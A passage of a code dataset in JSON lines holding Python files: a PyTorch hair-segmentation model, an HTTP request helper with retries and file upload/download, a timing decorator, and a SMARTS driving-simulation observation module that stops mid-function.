+{"seq_id":"30792559765","text":"import torch\r\nimport torch.nn as nn\r\n\r\nclass conv_start(nn.Module):\r\n def __init__(self,in_channels, out_channels):\r\n super(conv_start, self).__init__()\r\n self.conv = nn.Conv2d(in_channels,out_channels,kernel_size=3, stride= 2, padding=1)\r\n\r\n def forward(self,x):\r\n x=self.conv(x)\r\n return x\r\n\r\n\r\nclass encode_depthwise(nn.Module):\r\n def __init__(self,in_channels, out_channels,stride):\r\n super(encode_depthwise,self).__init__()\r\n self.conv = nn.Sequential(\r\n nn.Conv2d(in_channels,in_channels,3, stride, padding=1, groups=in_channels),\r\n nn.BatchNorm2d(in_channels),\r\n nn.ReLU(),\r\n nn.Conv2d(in_channels,out_channels,1, 1, 0),\r\n nn.BatchNorm2d(out_channels),\r\n nn.ReLU()\r\n )\r\n\r\n def forward(self,x):\r\n x= self.conv(x)\r\n return x\r\n\r\n\r\nclass decode_depthwise(nn.Module):\r\n def __init__(self,in_channels, out_channels):\r\n super(decode_depthwise,self).__init__()\r\n self.conv = nn.Sequential(\r\n nn.Conv2d(in_channels, in_channels, 3, 1, padding= 1, groups=in_channels),\r\n nn.Conv2d(in_channels, out_channels,1, 1, padding=0, groups=1),\r\n nn.ReLU()\r\n )\r\n\r\n def forward(self,x):\r\n x= self.conv(x)\r\n return x\r\n\r\n\r\nclass up_skip(nn.Module):\r\n def __init__(self,in_channels, out_channels):\r\n super(up_skip, self).__init__()\r\n self.up = nn.Upsample(scale_factor=2)\r\n self.conv = nn.Conv2d(in_channels, out_channels, 1, 1, 0) # stride랑 padding 값 궁금??\r\n\r\n def forward(self,x1,x2):\r\n x1 = self.up(x1)\r\n x2 = self.conv(x2)\r\n x = torch.add(x1, x2)\r\n return x\r\n\r\n\r\nclass conv_softmax(nn.Module):\r\n def __init__(self,in_channels,out_channels):\r\n super(conv_softmax, self).__init__()\r\n self.conv = nn.Sequential(\r\n nn.Conv2d(in_channels,out_channels, kernel_size=1, stride=1),\r\n\r\n )\r\n\r\n def forward(self, x):\r\n x = self.conv(x)\r\n return x\r\n\r\n\r\nclass Mobilehair(nn.Module):\r\n def __init__(self):\r\n super(Mobilehair, self).__init__()\r\n\r\n self.inc = conv_start(3,32)\r\n self.edw1 = encode_depthwise(32, 64, 1)\r\n self.edw2 = encode_depthwise(64, 128, 2)\r\n self.edw3 = encode_depthwise(128, 128, 1)\r\n self.edw4 = encode_depthwise(128, 256, 2)\r\n self.edw5 = encode_depthwise(256, 256, 1)\r\n self.edw6 = encode_depthwise(256, 512, 2)\r\n self.edw7 = encode_depthwise(512, 512, 1)\r\n self.edw8 = encode_depthwise(512, 512, 1)\r\n self.edw9 = encode_depthwise(512, 512, 1)\r\n self.edw10 = encode_depthwise(512, 512, 1)\r\n self.edw11 = encode_depthwise(512, 512, 1)\r\n self.edw12 = encode_depthwise(512, 1024, 2)\r\n self.edw13 = encode_depthwise(1024, 1024, 1)\r\n\r\n\r\n self.up1 = up_skip(512,1024)\r\n self.ddw1 = decode_depthwise(1024, 64)\r\n self.up2 = up_skip(256,64)\r\n self.ddw2 = decode_depthwise(64,64)\r\n self.up3 = up_skip(128,64)\r\n self.ddw3 = decode_depthwise(64, 64)\r\n self.up4 = up_skip(64,64)\r\n self.ddw4 = decode_depthwise(64, 64)\r\n self.up5 = nn.Upsample(scale_factor=2)\r\n self.ddw5 = decode_depthwise(64, 64)\r\n self.lac = conv_softmax(64,2)\r\n\r\n def forward(self, x):\r\n x1 = self.inc(x)\r\n x2 = self.edw1(x1)\r\n x3 = self.edw2(x2)\r\n x4 = self.edw3(x3)\r\n x5 = self.edw4(x4)\r\n x6 = self.edw5(x5)\r\n x7 = self.edw6(x6)\r\n x8 = self.edw7(x7)\r\n x9 = self.edw8(x8)\r\n x10 = self.edw9(x9)\r\n x11 = self.edw10(x10)\r\n x12 = self.edw11(x11)\r\n x13 = self.edw12(x12)\r\n x14 = self.edw13(x13)\r\n\r\n x = self.up1(x14,x12)\r\n x = self.ddw1(x)\r\n x = self.up2(x,x6)\r\n x = self.ddw2(x)\r\n x = self.up3(x,x4)\r\n x = self.ddw3(x)\r\n x = self.up4(x,x2)\r\n x = self.ddw4(x)\r\n x = self.up5(x)\r\n x = self.ddw5(x)\r\n x = self.lac(x)\r\n\r\n return x\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"prography/hair-color","sub_path":"Hong/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4104,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"}
+{"seq_id":"28061951523","text":"import os\nimport random\nimport sys\nimport time\nimport urllib.error\nimport urllib.parse\nimport urllib.request\nimport urllib.response\n\nimport chardet\nimport requests\nimport urllib3\n\n\nclass HttpRequestBase:\n def __init__(self, params=None, headers=None, timeout=200, retries=20, redirect=False, proxys=None):\n self.__agent = [\n 'Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11',\n 'Opera/9.25 (Windows NT 5.1; U; en)',\n 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',\n 'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',\n 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.12) Gecko/20070731 Ubuntu/dapper-security Firefox/1.5.0.12',\n 'Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/1.2.9',\n \"Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:10.0) Gecko/20100101 Firefox/10.0 \",\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0)',\n 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36',\n ]\n if headers is not None:\n self.__headers = headers\n else:\n self.__headers = {\n 'User-Agent': random.choice(self.__agent)\n }\n self.timeout = timeout\n self.retries = retries\n self.redirect = redirect\n self.param = params\n self.proxys = proxys\n\n def requests_request(self, method, url, codec=False, data=None):\n try:\n res = requests.request(method, url=url, params=self.param, data=data, headers=self.__headers,\n timeout=self.timeout, allow_redirects=self.redirect, proxies=self.proxys)\n if res.status_code == 200:\n content = res.content\n code = chardet.detect(content)[\"encoding\"]\n del content\n if code is not None:\n if codec:\n res.encoding = 'gbk'\n else:\n res.encoding = code\n text = res.text\n res.close()\n del res\n return text\n else:\n res.encoding = \"utf-8\"\n text = res.text\n res.close()\n del res\n return text\n elif res.status_code == 404 or res.status_code == 500 or res.status_code == 403 or res.status_code == 521:\n page = self.__retry_method(\"requests\", method, url)\n if page != \"\":\n return page\n else:\n return None\n else:\n return \"\"\n except requests.ConnectTimeout or requests.exceptions.ReadTimeout:\n page = self.__retry_method(\"requests\", method, url)\n if page != \"\":\n return page\n else:\n return \"\"\n except requests.ConnectionError:\n page = self.__retry_method(\"requests\", method, url)\n if page != \"\":\n return page\n else:\n return \"\"\n\n def urllib_request(self, method, url, data=None):\n content = ''\n try:\n if data is not None:\n request_data = urllib.parse.urlencode(data)\n http = urllib.request.Request(url, data=request_data, headers=self.__headers, method=method)\n else:\n http = urllib.request.Request(url, headers=self.__headers, method=method)\n req = urllib.request.urlopen(http)\n\n if req.status == 200:\n content = req.read()\n code = chardet.detect(content)[\"encoding\"]\n if code is not None:\n\n return str(content, encoding=code)\n else:\n return str(content, encoding=\"utf-8\")\n elif req.status == 403 or req.status == 404 or req.status == 500:\n page = self.__retry_method(\"urllib\", method, url)\n if page != \"\":\n return page\n else:\n return None\n else:\n return \"\"\n except urllib.error.HTTPError:\n page = self.__retry_method(\"urllib\", method, url)\n if page != \"\":\n return page\n else:\n return \"\"\n except urllib.error.URLError:\n page = self.__retry_method(\"urllib\", method, url)\n if page != \"\":\n return page\n else:\n return \"\"\n except UnicodeDecodeError:\n return str(content, encoding=\"GB18030\", errors='ignore')\n\n def urllib3_request(self, method, url, data=None):\n content = ''\n try:\n http = urllib3.PoolManager(timeout=self.timeout,\n retries=urllib3.Retry(self.retries, redirect=self.redirect))\n if data is not None:\n res = http.request_encode_body(method, url, fields=data, headers=self.__headers)\n elif self.param is not None:\n res = http.request_encode_url(method, url, fields=self.param, headers=self.__headers)\n else:\n res = http.request(method, url, headers=self.__headers, )\n if res.status == 200:\n content = res.data\n code = chardet.detect(content)[\"encoding\"]\n if code is not None:\n return str(content, encoding=code)\n else:\n return str(content, encoding=\"utf-8\")\n elif res.status == 403 or res.status == 404 or res.status == 500:\n page = self.__retry_method(\"urllib3\", method, url)\n if page != \"\":\n return page\n else:\n return None\n else:\n return \"\"\n except urllib3.exceptions.ConnectionError:\n page = self.__retry_method(\"urllib3\", method, url)\n if page != \"\":\n return page\n else:\n return \"\"\n except urllib3.exceptions.HTTPError:\n page = self.__retry_method(\"urllib3\", method, url)\n if page != \"\":\n return page\n else:\n return \"\"\n except urllib3.exceptions.ConnectTimeoutError:\n page = self.__retry_method(\"urllib3\", method, url)\n if page != \"\":\n return page\n else:\n return \"\"\n except urllib3.exceptions.RequestError:\n page = self.__retry_method(\"urllib3\", method, url)\n if page != \"\":\n return page\n else:\n return \"\"\n except UnicodeDecodeError:\n return str(content, encoding=\"GB18030\", errors='ignore')\n\n def __retry_method(self, old_method, method, url):\n sys.stdout.write(\"Retrying...\")\n if old_method == \"urllib\":\n page = self.urllib3_request(method, url)\n if page is not None and page != \"\":\n return page\n elif page is None:\n if method == \"POST\":\n return self.urllib3_request(\"GET\", url)\n elif method == \"GET\":\n return self.urllib3_request(\"POST\", url)\n else:\n return \"\"\n else:\n return \"\"\n elif old_method == \"urllib3\":\n page = self.requests_request(method, url)\n if page is not None and page != \"\":\n return page\n elif page is None:\n if method == \"POST\":\n return self.requests_request(\"GET\", url)\n elif method == \"GET\":\n return self.requests_request(\"POST\", url)\n else:\n return \"\"\n else:\n return \"\"\n if old_method == \"requests\":\n page = self.urllib_request(method, url)\n if page is not None and page != \"\":\n return page\n elif page is None:\n if method == \"POST\":\n return self.urllib_request(\"GET\", url)\n elif method == \"GET\":\n return self.urllib_request(\"POST\", url)\n else:\n return \"\"\n else:\n return \"\"\n\n @staticmethod\n def file_upload(path, url):\n file_size = os.path.getsize(path)\n file_name = os.path.split(path)[1]\n block_size = 10 * 1024 * 1024\n block_count = int(file_size / block_size)\n with open(path, \"rb\") as f:\n for index in range(block_count):\n if index == block_count - 1:\n block_size = file_size - index * block_size\n block = f.read(block_size)\n blob = {\n \"name\": file_name,\n \"index\": index\n }\n response = requests.post(url, data=blob, files={\"file\": block})\n if response.status_code == 200:\n print(response.text)\n else:\n break\n\n @staticmethod\n def url_download(path, url, show_progress=True):\n start = round(time.time(), 2)\n\n def format_time(second):\n second = int(second)\n str_format = \"{seconds}s\".format(seconds=second)\n if second // 60 > 0:\n minutes = round(second // 60)\n seconds = second - minutes * 60\n str_format = \"{minutes}m{seconds}s\".format(minutes=minutes, seconds=seconds)\n if second // 3600 > 0:\n hour = round(second // 3600)\n minutes = round((second - hour * 3600) // 60)\n seconds = second - minutes * 60 - hour * 3600\n str_format = \"{hour}h{minutes}m{seconds}s\".format(hour=hour, minutes=minutes, seconds=seconds)\n return str_format\n\n def download_reporter(blob_nums, blob_size, file_size):\n per = 100.0 * blob_nums * blob_size / file_size\n if per > 100:\n per = 100\n already_use = round(time.time(), 2) - start\n predict_use = round(already_use / (blob_nums + 1) * (file_size / blob_size - blob_nums + 1), 2)\n speed = round(8 * (blob_nums + 1) / already_use, 2)\n speed_str = str(speed) + \"KB/s\"\n if speed // 1024 > 0:\n speed = round(speed / 1024, 2)\n speed_str = str(speed) + \"MB/s\"\n if show_progress:\n sys.stdout.write(\"\\r\" + \"已下载:%.3f%%,已用时:%s,etc:%s,speed:%s\" % (\n per, format_time(already_use), format_time(predict_use), speed_str))\n del already_use, predict_use, speed, speed_str\n\n try:\n path = urllib.request.urlretrieve(url, path, reporthook=download_reporter)\n return path is not None\n except (urllib.error.HTTPError, urllib.error.URLError) as e:\n print(e)\n return HttpRequestBase.url_download(path, url, show_progress=False)\n except ValueError as e:\n print(e)\n except urllib.error.ContentTooShortError:\n return HttpRequestBase.url_download(path, url, show_progress=False)\n","repo_name":"CSNight/MMC-Services","sub_path":"server_utils/HttpRequestBase.py","file_name":"HttpRequestBase.py","file_ext":"py","file_size_in_byte":11531,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"3"}
+{"seq_id":"25853916136","text":"import time\n\ndef calculate_time(func):\n def wrapper_function(*args,**kwargs):\n print(f'executing .... square finder')\n t1= time.time()\n returned_value = func(*args,**kwargs)\n t2= time.time()\n total = t2-t1\n print(f\"time --> {total} sec\")\n return returned_value\n return wrapper_function\n\n@calculate_time\ndef add(a):\n l = [i**10 for i in range(1,a+1)]\n \n \nprint(add(1000))\n\n","repo_name":"mihirverma7781/Python-Scripts","sub_path":"chap14/ex1.py","file_name":"ex1.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"73284582161","text":"\"\"\"\nthis file contains tuned obs function and reward function\nfix ttc calculate\n\"\"\"\nimport math\n\nimport gym\nimport numpy as np\n\nfrom smarts.core.agent import AgentSpec\nfrom smarts.core.agent_interface import AgentInterface\nfrom smarts.core.agent_interface import OGM, NeighborhoodVehicles\nfrom smarts.core.controllers import ActionSpaceType\nfrom shapely.geometry import LineString\n\nfrom matplotlib.path import Path\n\nMAX_LANES = 5 # The maximum number of lanes we expect to see in any scenario.\nlane_crash_flag = False # used for training to signal a flipped car\nintersection_crash_flag = False # used for training to signal intersect crash\nglobal_max_len_lane_index = 0\nglobal_max_len_lane = 51\nglobal_lane_ttc = 1.\nglobal_in_genJ = False\nglobal_sample_wp_path = None\nglobal_int_in_gneJ = False\nglobal_last_len_wps_len = 1\nthreaten_distance = 1.\nhead_threaten_distance = 1.\nteal_threaten_distance = 1.\n\n# ==================================================\n# Continous Action Space\n# throttle, brake, steering\n# ==================================================\n\nACTION_SPACE = gym.spaces.Box(\n low=np.array([-1.0, -1.0]), high=np.array([1.0, 1.0]), dtype=np.float32\n)\n\n# ==================================================\n# Observation Space\n# This observation space should match the output of observation(..) below\n# ==================================================\nOBSERVATION_SPACE = gym.spaces.Dict(\n {\n # To make car follow the waypoints\n # distance from lane center\n \"distance_from_center\": gym.spaces.Box(low=-1e10, high=1e10, shape=(1,)),\n # relative heading angle from 10 waypoints in 50 forehead waypoints\n \"heading_errors\": gym.spaces.Box(low=-1.0, high=1.0, shape=(10,)),\n\n \"wp_errors\": gym.spaces.Box(low=-1e10, high=1e10, shape=(4,)),\n \"wp_speed_penalty\": gym.spaces.Box(low=-1e10, high=1e10, shape=(1,)),\n # Car attributes\n # ego speed\n \"speed\": gym.spaces.Box(low=-1e10, high=1e10, shape=(1,)),\n # ego steering\n \"steering\": gym.spaces.Box(low=-1e10, high=1e10, shape=(1,)),\n # To make car learn to slow down, overtake or dodge\n # distance to the closest car in each lane\n \"lane_dist\": gym.spaces.Box(low=-1e10, high=1e10, shape=(5,)),\n # time to collide to the closest car in each lane\n \"lane_ttc\": gym.spaces.Box(low=-1e10, high=1e10, shape=(5,)),\n # ego lane closest social vehicle relative speed\n \"closest_lane_nv_rel_speed\": gym.spaces.Box(low=-1e10, high=1e10, shape=(1,)),\n # distance to the closest car in possible intersection direction\n \"intersection_ttc\": gym.spaces.Box(low=-1e10, high=1e10, shape=(1,)),\n # time to collide to the closest car in possible intersection direction\n \"intersection_distance\": gym.spaces.Box(low=-1e10, high=1e10, shape=(1,)),\n # intersection closest social vehicle relative speed\n \"closest_its_nv_rel_speed\": gym.spaces.Box(low=-1e10, high=1e10, shape=(1,)),\n # intersection closest social vehicle relative position in vehicle heading coordinate\n \"closest_its_nv_rel_pos\": gym.spaces.Box(low=-1e10, high=1e10, shape=(2,)),\n\n \"min_dist\": gym.spaces.Box(low=-1e10, high=1e10, shape=(2,)),\n\n \"threaten_distance\": gym.spaces.Box(low=-1e10, high=1e10, shape=(3,)),\n \"detect_car\": gym.spaces.Box(low=-1e10, high=1e10, shape=(40,)),\n }\n)\n\n\ndef heading_to_degree(heading):\n # +y = 0 rad. Note the 0 means up direction\n return np.degrees((heading + math.pi) % (2 * math.pi))\n\n\ndef heading_to_vec(heading):\n # axis x: right, y:up\n angle = (heading + math.pi * 0.5) % (2 * math.pi)\n return np.array([math.cos(angle), math.sin(angle)])\n\n\ndef ttc_by_path(ego, wp_paths, neighborhood_vehicle_states, ego_closest_wp):\n global lane_crash_flag\n global intersection_crash_flag\n\n # init flag, dist, ttc, headings\n lane_crash_flag = False\n intersection_crash_flag = False\n\n # default 10s\n lane_ttc = np.array([1] * 5, dtype=float)\n # default 100m\n lane_dist = np.array([1] * 5, dtype=float)\n # default 120km/h\n closest_lane_nv_rel_speed = 1\n\n intersection_ttc = 1\n intersection_distance = 1\n closest_its_nv_rel_speed = 1\n # default 100m\n closest_its_nv_rel_pos = np.array([1, 1])\n\n # here to set invalid value to 0\n wp_paths_num = len(wp_paths)\n lane_ttc[wp_paths_num:] = 0\n lane_dist[wp_paths_num:] = 0\n\n # return if no neighbour vehicle or off the routes(no waypoint paths)\n if not neighborhood_vehicle_states or not wp_paths_num:\n return (\n lane_ttc,\n lane_dist,\n closest_lane_nv_rel_speed,\n intersection_ttc,\n intersection_distance,\n closest_its_nv_rel_speed,\n closest_its_nv_rel_pos,\n )\n\n # merge waypoint paths (consider might not the same length)\n merge_waypoint_paths = []\n for wp_path in wp_paths:\n merge_waypoint_paths += wp_path\n\n wp_poses = np.array([wp.pos for wp in merge_waypoint_paths])\n\n # compute neighbour vehicle closest wp\n nv_poses = np.array([nv.position for nv in neighborhood_vehicle_states])\n nv_wp_distance = np.linalg.norm(nv_poses[:, :2][:, np.newaxis] - wp_poses, axis=2)\n nv_closest_wp_index = np.argmin(nv_wp_distance, axis=1)\n nv_closest_distance = np.min(nv_wp_distance, axis=1)\n\n # get not in same lane id social vehicles(intersect vehicles and behind vehicles)\n wp_lane_ids = np.array([wp.lane_id for wp in merge_waypoint_paths])\n nv_lane_ids = np.array([nv.lane_id for nv in neighborhood_vehicle_states])\n not_in_same_lane_id = nv_lane_ids[:, np.newaxis] != wp_lane_ids\n not_in_same_lane_id = np.all(not_in_same_lane_id, axis=1)\n\n ego_edge_id = ego.lane_id[1:-2] if ego.lane_id[0] == \"-\" else ego.lane_id[:-2]\n nv_edge_ids = np.array(\n [\n nv.lane_id[1:-2] if nv.lane_id[0] == \"-\" else nv.lane_id[:-2]\n for nv in neighborhood_vehicle_states\n ]\n )\n not_in_ego_edge_id = nv_edge_ids[:, np.newaxis] != ego_edge_id\n not_in_ego_edge_id = np.squeeze(not_in_ego_edge_id, axis=1)\n\n is_not_closed_nv = not_in_same_lane_id & not_in_ego_edge_id\n not_closed_nv_index = np.where(is_not_closed_nv)[0]\n\n # filter sv not close to the waypoints including behind the ego or ahead past the end of the waypoints\n close_nv_index = np.where(nv_closest_distance < 2)[0]\n\n if not close_nv_index.size:\n pass\n else:\n close_nv = [neighborhood_vehicle_states[i] for i in close_nv_index]\n\n # calculate waypoints distance to ego car along the routes\n wps_with_lane_dist_list = []\n for wp_path in wp_paths:\n path_wp_poses = np.array([wp.pos for wp in wp_path])\n wp_poses_shift = np.roll(path_wp_poses, 1, axis=0)\n wps_with_lane_dist = np.linalg.norm(path_wp_poses - wp_poses_shift, axis=1)\n wps_with_lane_dist[0] = 0\n wps_with_lane_dist = np.cumsum(wps_with_lane_dist)\n wps_with_lane_dist_list += wps_with_lane_dist.tolist()\n wps_with_lane_dist_list = np.array(wps_with_lane_dist_list)\n\n # get neighbour vehicle closest waypoints index\n nv_closest_wp_index = nv_closest_wp_index[close_nv_index]\n # ego car and neighbour car distance, not very accurate since use the closest wp\n ego_nv_distance = wps_with_lane_dist_list[nv_closest_wp_index]\n\n # get neighbour vehicle lane index\n nv_lane_index = np.array(\n [merge_waypoint_paths[i].lane_index for i in nv_closest_wp_index]\n )\n\n # get wp path lane index\n lane_index_list = [wp_path[0].lane_index for wp_path in wp_paths]\n\n for i, lane_index in enumerate(lane_index_list):\n # get same lane vehicle\n same_lane_nv_index = np.where(nv_lane_index == lane_index)[0]\n if not same_lane_nv_index.size:\n continue\n same_lane_nv_distance = ego_nv_distance[same_lane_nv_index]\n closest_nv_index = same_lane_nv_index[np.argmin(same_lane_nv_distance)]\n closest_nv = close_nv[closest_nv_index]\n closest_nv_speed = closest_nv.speed\n closest_nv_heading = closest_nv.heading\n # radius to degree\n closest_nv_heading = heading_to_degree(closest_nv_heading)\n\n closest_nv_pos = closest_nv.position[:2]\n bounding_box = closest_nv.bounding_box\n\n # map the heading to make it consistent with the position coordination\n map_heading = (closest_nv_heading + 90) % 360\n map_heading_radius = np.radians(map_heading)\n nv_heading_vec = np.array(\n [np.cos(map_heading_radius), np.sin(map_heading_radius)]\n )\n nv_heading_vertical_vec = np.array([-nv_heading_vec[1], nv_heading_vec[0]])\n\n # get four edge center position (consider one vehicle take over two lanes when change lane)\n # maybe not necessary\n closest_nv_front = closest_nv_pos + bounding_box.length * nv_heading_vec\n closest_nv_behind = closest_nv_pos - bounding_box.length * nv_heading_vec\n closest_nv_left = (\n closest_nv_pos + bounding_box.width * nv_heading_vertical_vec\n )\n closest_nv_right = (\n closest_nv_pos - bounding_box.width * nv_heading_vertical_vec\n )\n edge_points = np.array(\n [closest_nv_front, closest_nv_behind, closest_nv_left, closest_nv_right]\n )\n\n ep_wp_distance = np.linalg.norm(\n edge_points[:, np.newaxis] - wp_poses, axis=2\n )\n ep_closed_wp_index = np.argmin(ep_wp_distance, axis=1)\n ep_closed_wp_lane_index = set(\n [merge_waypoint_paths[i].lane_index for i in ep_closed_wp_index]\n + [lane_index]\n )\n\n min_distance = np.min(same_lane_nv_distance)\n\n if ego_closest_wp.lane_index in ep_closed_wp_lane_index:\n if min_distance < 6:\n lane_crash_flag = True\n\n nv_wp_heading = (\n closest_nv_heading\n - heading_to_degree(\n merge_waypoint_paths[\n nv_closest_wp_index[closest_nv_index]\n ].heading\n )\n ) % 360\n\n # find those car just get from intersection lane into ego lane\n if nv_wp_heading > 30 and nv_wp_heading < 330:\n relative_close_nv_heading = closest_nv_heading - heading_to_degree(\n ego.heading\n )\n # map nv speed to ego car heading\n map_close_nv_speed = closest_nv_speed * np.cos(\n np.radians(relative_close_nv_heading)\n )\n closest_lane_nv_rel_speed = min(\n closest_lane_nv_rel_speed,\n (map_close_nv_speed - ego.speed) * 3.6 / 120,\n )\n else:\n closest_lane_nv_rel_speed = min(\n closest_lane_nv_rel_speed,\n (closest_nv_speed - ego.speed) * 3.6 / 120,\n )\n\n relative_speed_m_per_s = ego.speed - closest_nv_speed\n\n if abs(relative_speed_m_per_s) < 1e-5:\n relative_speed_m_per_s = 1e-5\n\n ttc = min_distance / relative_speed_m_per_s\n # normalized into 10s\n ttc /= 10\n\n for j in ep_closed_wp_lane_index:\n if min_distance / 100 < lane_dist[j]:\n # normalize into 100m\n lane_dist[j] = min_distance / 100\n\n if ttc <= 0:\n continue\n\n if j == ego_closest_wp.lane_index:\n if ttc < 0.1:\n lane_crash_flag = True\n\n if ttc < lane_ttc[j]:\n lane_ttc[j] = ttc\n\n # get vehicles not in the waypoints lane\n if not not_closed_nv_index.size:\n pass\n else:\n filter_nv = [neighborhood_vehicle_states[i] for i in not_closed_nv_index]\n\n nv_pos = np.array([nv.position for nv in filter_nv])[:, :2]\n nv_heading = heading_to_degree(np.array([nv.heading for nv in filter_nv]))\n nv_speed = np.array([nv.speed for nv in filter_nv])\n\n ego_pos = ego.position[:2]\n ego_heading = heading_to_degree(ego.heading)\n ego_speed = ego.speed\n nv_to_ego_vec = nv_pos - ego_pos\n\n line_heading = (\n (np.arctan2(nv_to_ego_vec[:, 1], nv_to_ego_vec[:, 0]) * 180 / np.pi) - 90\n ) % 360\n nv_to_line_heading = (nv_heading - line_heading) % 360\n ego_to_line_heading = (ego_heading - line_heading) % 360\n\n # judge two heading whether will intersect\n same_region = (nv_to_line_heading - 180) * (\n ego_to_line_heading - 180\n ) > 0 # both right of line or left of line\n ego_to_nv_heading = ego_to_line_heading - nv_to_line_heading\n valid_relative_angle = (\n (nv_to_line_heading - 180 > 0) & (ego_to_nv_heading > 0)\n ) | ((nv_to_line_heading - 180 < 0) & (ego_to_nv_heading < 0))\n\n # emit behind vehicles\n valid_intersect_angle = np.abs(line_heading - ego_heading) < 90\n\n # emit patient vehicles which stay in the intersection\n not_patient_nv = nv_speed > 0.01\n\n # get valid intersection sv\n intersect_sv_index = np.where(\n same_region & valid_relative_angle & valid_intersect_angle & not_patient_nv\n )[0]\n\n if not intersect_sv_index.size:\n pass\n else:\n its_nv_pos = nv_pos[intersect_sv_index][:, :2]\n its_nv_speed = nv_speed[intersect_sv_index]\n its_nv_to_line_heading = nv_to_line_heading[intersect_sv_index]\n line_heading = line_heading[intersect_sv_index]\n # ego_to_line_heading = ego_to_line_heading[intersect_sv_index]\n\n # get intersection closest vehicle\n ego_nv_distance = np.linalg.norm(its_nv_pos - ego_pos, axis=1)\n ego_closest_its_nv_index = np.argmin(ego_nv_distance)\n ego_closest_its_nv_distance = ego_nv_distance[ego_closest_its_nv_index]\n\n line_heading = line_heading[ego_closest_its_nv_index]\n ego_to_line_heading = (\n heading_to_degree(ego_closest_wp.heading) - line_heading\n ) % 360\n\n ego_closest_its_nv_speed = its_nv_speed[ego_closest_its_nv_index]\n its_closest_nv_to_line_heading = its_nv_to_line_heading[\n ego_closest_its_nv_index\n ]\n # rel speed along ego-nv line\n closest_nv_rel_speed = ego_speed * np.cos(\n np.radians(ego_to_line_heading)\n ) - ego_closest_its_nv_speed * np.cos(\n np.radians(its_closest_nv_to_line_heading)\n )\n closest_nv_rel_speed_m_s = closest_nv_rel_speed\n if abs(closest_nv_rel_speed_m_s) < 1e-5:\n closest_nv_rel_speed_m_s = 1e-5\n ttc = ego_closest_its_nv_distance / closest_nv_rel_speed_m_s\n\n intersection_ttc = min(intersection_ttc, ttc / 10)\n intersection_distance = min(\n intersection_distance, ego_closest_its_nv_distance / 100\n )\n\n # transform relative pos to ego car heading coordinate\n rotate_axis_angle = np.radians(90 - ego_to_line_heading)\n closest_its_nv_rel_pos = (\n np.array(\n [\n ego_closest_its_nv_distance * np.cos(rotate_axis_angle),\n ego_closest_its_nv_distance * np.sin(rotate_axis_angle),\n ]\n )\n / 100\n )\n\n closest_its_nv_rel_speed = min(\n closest_its_nv_rel_speed, -closest_nv_rel_speed * 3.6 / 120\n )\n\n if ttc < 0:\n pass\n else:\n intersection_ttc = min(intersection_ttc, ttc / 10)\n intersection_distance = min(\n intersection_distance, ego_closest_its_nv_distance / 100\n )\n\n # if to collide in 3s, make it slow down\n if ttc < 2 or ego_closest_its_nv_distance < 6:\n intersection_crash_flag = True\n\n return (\n lane_ttc,\n lane_dist,\n closest_lane_nv_rel_speed,\n intersection_ttc,\n intersection_distance,\n closest_its_nv_rel_speed,\n closest_its_nv_rel_pos,\n )\n\n\ndef ego_ttc_calc(ego_lane_index, ttc_by_path, lane_dist):\n # transform lane ttc and dist to make ego lane in the array center\n\n # index need to be set to zero\n # 4: [0,1], 3:[0], 2:[], 1:[4], 0:[3,4]\n zero_index = [[3, 4], [4], [], [0], [0, 1]]\n zero_index = zero_index[ego_lane_index]\n\n ttc_by_path[zero_index] = 0\n lane_ttc = np.roll(ttc_by_path, 2 - ego_lane_index)\n lane_dist[zero_index] = 0\n ego_lane_dist = np.roll(lane_dist, 2 - ego_lane_index)\n\n return lane_ttc, ego_lane_dist\n\n\ndef get_distance_from_center(env_obs):\n ego_state = env_obs.ego_vehicle_state\n wp_paths = env_obs.waypoint_paths\n closest_wps = [path[0] for path in wp_paths]\n\n # distance of vehicle from center of lane\n closest_wp = min(closest_wps, key=lambda wp: wp.dist_to(ego_state.position))\n signed_dist_from_center = closest_wp.signed_lateral_error(ego_state.position)\n lane_hwidth = closest_wp.lane_width * 0.5\n norm_dist_from_center = signed_dist_from_center / lane_hwidth\n\n return norm_dist_from_center\n\n\n# ==================================================\n# obs function\n# ==================================================\n\n\"\"\"通过小车的位置,朝向,大小计算出小车四个角的位置\n\"\"\"\ndef get_ego_position(ego_position, \n ego_heading, \n ego_bounding_box):\n # corner\n l, h = ego_bounding_box\n ego_heading_cosine = np.cos(-ego_heading)\n ego_heading_sine = np.sin(-ego_heading)\n\n ego_left_up_corner = ego_position + np.array([\n -h / 2 * ego_heading_cosine + l / 2 * ego_heading_sine,\n l / 2 * ego_heading_cosine - -h / 2 * ego_heading_sine]).reshape(-1)\n ego_right_up_corner = ego_position + np.array([\n h / 2 * ego_heading_cosine + l / 2 * ego_heading_sine,\n l / 2 * ego_heading_cosine - h / 2 * ego_heading_sine]).reshape(-1)\n ego_left_down_corner = ego_position + np.array([\n -h / 2 * ego_heading_cosine + -l / 2 * ego_heading_sine,\n -l / 2 * ego_heading_cosine - -h / 2 * ego_heading_sine]).reshape(-1)\n ego_right_down_corner = ego_position + np.array([\n h / 2 * ego_heading_cosine + -l / 2 * ego_heading_sine,\n -l / 2 * ego_heading_cosine - +h / 2 * ego_heading_sine]).reshape(-1)\n\n return np.array([ego_left_up_corner,\n ego_right_up_corner,\n ego_right_down_corner,\n ego_left_down_corner])\n\n\"\"\"计算180度扇形范围内离我最近的3辆车的信息 [pos_x, pos_y, speed, heading]\n\"\"\"\ndef detect_sector_car(env_obs):\n def _cal_angle(vec):\n if vec[1] < 0:\n base_angle = math.pi\n base_vec = 